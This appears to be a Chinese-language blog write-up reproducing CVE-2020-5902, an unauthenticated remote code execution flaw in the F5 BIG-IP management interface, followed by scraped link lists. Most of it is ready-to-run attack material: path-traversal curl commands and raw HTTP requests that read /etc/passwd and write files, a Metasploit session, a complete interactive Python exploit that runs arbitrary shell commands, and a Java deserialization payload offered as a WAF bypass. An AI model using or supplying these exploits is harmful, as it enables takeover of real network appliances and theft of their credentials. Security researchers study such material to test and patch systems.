CVE-2020-5902 F5 BIG-IP 远程代码执行漏洞复现

漏洞介绍

F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。

近日,F5官方公布流量管理用户界面(TMUI)使用程序的特定页面中存在一处远程代码执行漏洞(CVE-2020-5902)

影响版本

BIG-IP 15.x: 15.1.0/15.0.0

BIG-IP 14.x: 14.1.0 ~ 14.1.2

BIG-IP 13.x: 13.1.0 ~ 13.1.3

BIG-IP 12.x: 12.1.0 ~ 12.1.5

BIG-IP 11.x: 11.6.1 ~ 11.6.5

poc

https://twitter.com/x4ce/status/1279790599793545216

RCE:

curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

Read File:

curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'


GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Cookie: JSESSIONID=A5AC072B883CB89A7FC015516ACB793C

Upgrade-Insecure-Requests: 1

DNT: 1

Cache-Control: max-age=0

List File

curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/'


GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Cookie: JSESSIONID=A5AC072B883CB89A7FC015516ACB793C

Upgrade-Insecure-Requests: 1

DNT: 1

Cache-Control: max-age=0

Upload File

Example: /tmui/locallb/workspace/fileSave.jsp

POST: fileName=/tmp/2333.txt&content=test

POST /tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 39

fileName=/tmp/2333.txt&content=test

HTTP/1.1 200 OK

Date: Wed, 08 Jul 2020 12:06:04 GMT

X-Frame-Options: SAMEORIGIN

Strict-Transport-Security: max-age=16070400; includeSubDomains

Set-Cookie: JSESSIONID=F4430C6A7479E77F59DF6CE710C8BF3D; Path=/tmui; Secure; HttpOnly

Content-Type: text/html; charset=ISO-8859-1

X-Content-Type-Options: nosniff

X-XSS-Protection: 1; mode=block

Content-Security-Policy: default-src 'self'  'unsafe-inline' 'unsafe-eval'; img-src 'self'  http://127.4.1.1 http://127.4.2.1

Vary: Accept-Encoding

Content-Length: 4

Connection: close

File Read /tmp/2333.txt

GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/tmp/2333.txt HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Content-Length: 2

HTTP/1.1 200 OK

Date: Wed, 08 Jul 2020 12:11:29 GMT

X-Frame-Options: SAMEORIGIN

Strict-Transport-Security: max-age=16070400; includeSubDomains

Set-Cookie: JSESSIONID=3FDC814B93AE8F030236DAE60E67F47E; Path=/tmui; Secure; HttpOnly

Content-Type: text/html; charset=ISO-8859-1

X-Content-Type-Options: nosniff

X-XSS-Protection: 1; mode=block

Content-Security-Policy: default-src 'self'  'unsafe-inline' 'unsafe-eval'; img-src 'self'  http://127.4.1.1 http://127.4.2.1

Vary: Accept-Encoding

Content-Length: 27

Connection: close

{"output":"test\n\n\n"}

MSF f5_bigip_tmui_rce

https://github.com/rapid7/metasploit-framework/blob/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb

msf use

wget -P /usr/share/metasploit-framework/modules/exploits/linux/http/ https://raw.githubusercontent.com/rapid7/metasploit-framework/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb

reload_all

exploit/linux/http/f5_bigip_tmui_rce            2020-06-30       excellent  Yes    F5 BIG-IP TM


root@kali:~/Desktop# msfdb init && msfconsole -q

[i] Database already started

[i] The database appears to be already configured, skipping initialization

msf5 > exit

root@kali:~/Desktop# msfdb init && msfconsole -q

[i] Database already started

[i] The database appears to be already configured, skipping initialization

msf5 > reload_all

[*] Reloading modules from all module paths...

                 _---------.

             .' #######   ;."

  .---,.    ;@             @@`;   .---,..

." @@@@@'.,'@@            @@@@@',.'@@@@ ".

'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;

   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'

     "--'.@@@  -.@        @ ,'-   .'--"

          ".@' ; @       @ `.  ;'

            |@@@@ @@@     @    .

             ' @@@ @@   @@    ,

              `.@@@@    @@   .

                ',@@     @   ;           _____________

                 (   3 C    )     /|___ / Metasploit! \

                 ;@'. __*__,."    \|--- \_____________/

                  '(.,...."/                                                                         

       =[ metasploit v5.0.95-dev                          ]

+ -- --=[ 2040 exploits - 1103 auxiliary - 344 post       ]

+ -- --=[ 566 payloads - 45 encoders - 10 nops            ]

+ -- --=[ 7 evasion                                       ]

Metasploit tip: View advanced module options with advanced

msf5 > search f5_bigip

Matching Modules

================

   #  Name                                            Disclosure Date  Rank       Check  Description

   -  ----                                            ---------------  ----       -----  -----------

   0  auxiliary/dos/http/f5_bigip_apm_max_sessions                     normal     No     F5 BigIP Access Policy Manager Session Exhaustion Denial of Service

   1  auxiliary/gather/f5_bigip_cookie_disclosure                      normal     No     F5 BigIP Backend Cookie Disclosure

   2  auxiliary/scanner/http/f5_bigip_virtual_server                   normal     No     F5 BigIP HTTP Virtual Server Scanner

   3  exploit/linux/http/f5_bigip_tmui_rce            2020-06-30       excellent  Yes    F5 BIG-IP TMUI Directory Traversal and File Upload RCE

   4  exploit/linux/ssh/f5_bigip_known_privkey        2012-06-11       excellent  No     F5 BIG-IP SSH Private Key Exposure

tmshCmd.jsp + fileSave.jsp = Linux RCE

1. tmshCmd.jsp?command=create+cli+alias+private+list+command+bash

2. fileSave.jsp?fileName=/tmp/cmd&content=id

3. tmshCmd.jsp?command=list+/tmp/cmd

4. tmshCmd.jsp?command=delete+cli+alias+private+list

原文地址:

https://twitter.com/x4ce/status/1279790599793545216

cve-2020-5902 RCE 绕过方式

通过bash执行命令的 payload

#coding:utf-8

import requests

import json

import requests.packages.urllib3

requests.packages.urllib3.disable_warnings()

import uuid

import sys

# tmshCmd.jsp?command=create+cli+alias+private+list+command+bash

# fileSave.jsp?fileName=/tmp/cmd&content=id

# tmshCmd.jsp?command=list+/tmp/cmd

# tmshCmd.jsp?command=delete+cli+alias+private+list

banner = r'''

 _______  _______    ______  _________ _______   _________ _______    _______  _______  _______

(  ____ \(  ____ \  (  ___ \ \__   __/(  ____ \  \__   __/(  ____ )  (  ____ )(  ____ \(  ____ \

| (    \/| (    \/  | (   ) )   ) (   | (    \/     ) (   | (    )|  | (    )|| (    \/| (    \/

| (__    | (____    | (__/ /    | |   | |           | |   | (____)|  | (____)|| |      | (__

|  __)   (_____ \   |  __ (     | |   | | ____      | |   |  _____)  |     __)| |      |  __)

| (            ) )  | (  \ \    | |   | | \_  )     | |   | (        | (\ (   | |      | (

| )      /\____) )  | )___) )___) (___| (___) |  ___) (___| )        | ) \ \__| (____/\| (____/\

|/       \______/   |/ \___/ \_______/(_______)  \_______/|/         |/   \__/(_______/(_______/

                        CVE-2020-5902 UnAuth RCE Vuln

                            Python By Jas502n

From: https://github.com/rapid7/metasploit-framework/blob/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb

____________________________________________________________________________________________________________________________________________________

'''

def tmshCmd_exit(url,file,cmd):

    tmshCmd_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash"

    proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}

    r = requests.get(tmshCmd_url,verify=False,allow_redirects=False)

    # r = requests.get(tmshCmd_url,verify=False,allow_redirects=False,proxies=proxies)

    response_str = json.dumps(r.headers.__dict__['_store'])

    # print type(response_str)

    # print response_str

    if r.status_code == 200 and 'tmui' in response_str:

        # print tmshCmd_url

        print "[+] tmshCmd.jsp Exit!"

        print "[+] create cli alias private list command bash \n"

        # cmd = 'whoami'

        upload_exit(url,file,cmd)

    else:

        print "[+] tmshCmd.jsp No Exit!\n"

def upload_exit(url,file,cmd):

    fileSave_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/%s&content="%file + cmd

    proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}

    r = requests.get(fileSave_url,verify=False,allow_redirects=False)

    # r = requests.get(fileSave_url,verify=False,allow_redirects=False,proxies=proxies)

    response_str = json.dumps(r.headers.__dict__['_store'])

    if r.status_code == 200 and 'tmui' in response_str:

        # print fileSave_url

        print "[+] fileSave.jsp Exit!\n"

        list_command(url,file)

    else:

        print "[+] fileSave.jsp No Exit!\n"

def list_command(url,file):

    rce_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/%s" % file

    proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}

    r = requests.get(rce_url,verify=False,allow_redirects=False)

    # r = requests.get(rce_url,verify=False,allow_redirects=False,proxies=proxies)

    response_str = json.dumps(r.headers.__dict__['_store'])

    # print len(r.content)

    if r.status_code == 200 and 'tmui' in response_str:

        if len(r.content) > 33:

            # print rce_url

            print "[+] Command Successfull !\n"

            command_result = json.loads(r.content)

            print "_"*90,'\n\n'

            print command_result['output']

            print "_"*90,"\n\n"

            delete_list(url)

    else:

        print "[+] Command Failed !\n"

def delete_list(url):

    delete_url = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'

    proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}

    r = requests.get(delete_url,verify=False,allow_redirects=False)

    # r = requests.get(delete_url,verify=False,allow_redirects=False,proxies=proxies)

    response_str = json.dumps(r.headers.__dict__['_store'])

    if r.status_code == 200 and 'tmui' in response_str:

        # print delete_url

        print "[+] delete cli alias private list Successfull! \n"

    else:

        print "[+] delete cli alias private list Failed! \n"

if __name__ == '__main__':

    print banner

    while 1:

        url = "https://x.x.x.x/"

        # url = sys.argv[1]

        file = str(uuid.uuid1())

        print "/tmp/" + file,"\n"

        cmd = raw_input("[+]Set Cmd= ")

        print

        tmshCmd_exit(url,file,cmd)

通过java反序列化绕过waf的payload

/*

 Exploit Title: F5 BIG-IP Remote Code Execution

 Date: 2020-07-06

 Authors: Charles Dardaman of Critical Start, TeamARES

                  Rich Mirch of Critical Start, TeamARES

 CVE: CVE-2020-5902

 Requirements:

   Java JDK

   hsqldb.jar 1.8

   ysoserial https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar

*/

import java.sql.Connection;

import java.sql.DriverManager;

import java.sql.Statement;

import java.nio.file.Files;

import java.nio.file.Paths;

import java.io.IOException;

import org.hsqldb.lib.StringConverter;

public class f5RCE {

	public static void main(String[] args) {

		Connection connection;

		Statement statement;

		if(args.length != 2) {

			System.err.println("\nUsage: <hostname> <payload.txt>\n");

			System.exit(1);

		}

		String server = args[0];

		String pfile = args[1];

		String payload = null;

		try {

			payload = new String(Files.readAllBytes(Paths.get(pfile)));

			payload = payload.replaceAll("(\\n|\\r)","");

		} catch (IOException e) {

			e.printStackTrace();

		}

		String dburl = "jdbc:hsqldb:https://" + server +

                               ":443/tmui/login.jsp/..%3b/hsqldb/";

		System.out.println("Connecting to " + server);

		try {

			Class.forName("org.hsqldb.jdbcDriver");

			connection = DriverManager.getConnection(dburl, "sa","");

			statement = connection.createStatement();

			statement.execute("call \"java.lang.System.setProperty\"('org.apache.commons.collections.enableUnsafeSerialization','true')");

			statement.execute("call \"org.hsqldb.util.ScriptTool.main\"('" + payload +"');");

		} catch (java.sql.SQLException sqle) {

			// ignore java.sql.SQLException: S1000

			// General error java.lang.IllegalArgumentException: argument type mismatch

			if(sqle.getSQLState().equals("S1000") && sqle.getErrorCode() == 40) {

				System.out.println("Payload executed");

			} else {

				System.out.println("Unexpected SQL error");

				sqle.printStackTrace();

			}

			return;

		}

		catch (ClassNotFoundException cne) {

			System.err.println("Error loading db driver");

			cne.printStackTrace();

			return;

		}

	}

}

参考链接

1、https://twitter.com/x4ce/status/1279790599793545216

2、https://github.com/jas502n/CVE-2020-5902/

3、https://github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902

CVE-2020-5902 F5 BIG-IP 远程代码执行漏洞的更多相关文章

  1. F5 BIG-IP 远程代码执行漏洞环境搭建

    最近F5设备里的远程代码执行漏洞可谓是火爆,漏洞评分10分,所以,我也想搭建下环境复现一下该漏洞 漏洞详情 F5 BIG-IP 是美国F5公司一款集成流量管理.DNS.出入站规则.web应用防火墙.w ...

  2. Apache Struts 远程代码执行漏洞(CVE-2013-4316)

    漏洞版本: Apache Group Struts < 2.3.15.2 漏洞描述: BUGTRAQ ID: 62587 CVE(CAN) ID: CVE-2013-4316 Struts2 是 ...

  3. MongoDB ‘conn’Mongo 对象远程代码执行漏洞

    漏洞名称: MongoDB ‘conn’Mongo 对象远程代码执行漏洞 CNNVD编号: CNNVD-201307-497 发布时间: 2013-07-25 更新时间: 2013-07-25 危害等 ...

  4. Struts2再爆远程代码执行漏洞

    Struts又爆远程代码执行漏洞!在这次的漏洞中,攻击者可以通过操纵参数远程执行恶意代码.Struts 2.3.15.1之前的版本,参数action的值redirect以及redirectAction ...

  5. 【漏洞公告】CVE-2017-12615/CVE-2017-12616:Tomcat信息泄漏和远程代码执行漏洞

    2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,该漏洞受影响版本为7.0-7.80之间,在一定 ...

  6. PHPMailer < 5.2.18 远程代码执行漏洞(CVE-2016-10033)

    PHPMailer < 5.2.18 Remote Code Execution 本文将简单展示一下PHPMailer远程代码执行漏洞(CVE-2016-10033)的利用过程,使用的是别人已经 ...

  7. 隐藏17年的Office远程代码执行漏洞(CVE-2017-11882)

    Preface 这几天关于Office的一个远程代码执行漏洞很流行,昨天也有朋友发了相关信息,于是想复现一下看看,复现过程也比较简单,主要是简单记录下. 利用脚本Github传送地址 ,后面的参考链接 ...

  8. phpcms2008远程代码执行漏洞

    phpcms2008远程代码执行漏洞 描述: 近日,互联网爆出PHPCMS2008代码注入漏洞(CVE-2018-19127).攻击者利用该漏洞,可在未授权的情况下实现对网站文件的写入.该漏洞危害程度 ...

  9. [转帖]Windows DHCPServer远程代码执行漏洞分析(CVE-2019-0626)

    Windows DHCPServer远程代码执行漏洞分析(CVE-2019-0626) ADLab2019-03-15共23605人围观 ,发现 4 个不明物体安全报告漏洞 https://www.f ...

随机推荐

  1. grafana 如何对数据进行切分

    也就是如何增加筛选,根据想要的条件筛选不同的内容,数据源是prometheus 效果 设置variable 正则表达式 匹配url中IP和端口 切片进阶 根据前一个切片 再过滤 含义说明 instan ...

  2. Unit3-窝窝社交圈

    全文共4909字,推荐阅读时间15~20分钟. 文章共分五个部分: JML总结 作业分析 评测相关 重构策略 课程体验感受 JML总结 定义 JML是一种对Java程序进行规格化设计的表示语言 JML ...

  3. RANK()的对比(SQL, Minitab, Excel)

    RANK()的对比(SQL, Minitab, Excel)也不是想来做什么对比的,只是顺便写此文,想学习一下Minitab的应用以便用它分析解决实际的问题. 回顾 May 23文章“开窗函数_ROW ...

  4. Charles抓包1-Charles安装汉化(附正版注册码)

    目录 1.下载&&安装 2.汉化 1.下载&&安装 charles官网 charles下载 下载后直接安装即可. 2.汉化 下载提供的汉化包charles.jar(加群 ...

  5. 【漏洞复现】Fastjson <=1.2.47远程命令执行

      0x01 漏洞概述 漏洞描述 Fastjson是一款开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBe ...

  6. 如何安装vim自动补全插件YouCompleteMe(YCM)

    Vim是全平台上一个高度可拓展的编辑器.它本身只是一个简陋的编辑器,但是因为有各种插件而变得强大.使用Vim编写代码就不免遇到代码补全的问题.常用的代码补全插件有两个:日本人shougo写的neoco ...

  7. node实现文件属性批量修改(时间属性)

    前言 在默认情况下,一个文件的创建时间和修改时间是系统自己设定的,我们不能修改该的.但我们有时为了某种特殊需要,为了不让别人一眼看出文件已经给修改了,我们又需要修改文件的创建时间和修改时间.那么如何修 ...

  8. 小师妹学JVM之:JIT中的LogCompilation

    目录 简介 LogCompilation简介 LogCompilation的使用 解析LogCompilation文件 总结 简介 我们知道在JVM中为了加快编译速度,引入了JIT即时编译的功能.那么 ...

  9. 线程基础9-quene讲解

    在学习Java 多线程并发开发过程中,了解到DelayQueue类的主要作用:是一个无界的BlockingQueue,用于放置实现了Delayed接口的对象,其中的对象只能在其到期时才能从队列中取走. ...

  10. 01[了解] Dubbo

    什么是Dubbo? 概述 Dubbo是阿里巴巴内部使用的分布式业务框架,2012年由阿里巴巴开源. 由于Dubbo在阿里内部经过广泛的业务验证,在很短时间内,Dubbo就被许多互联网公司所采用,并产生 ...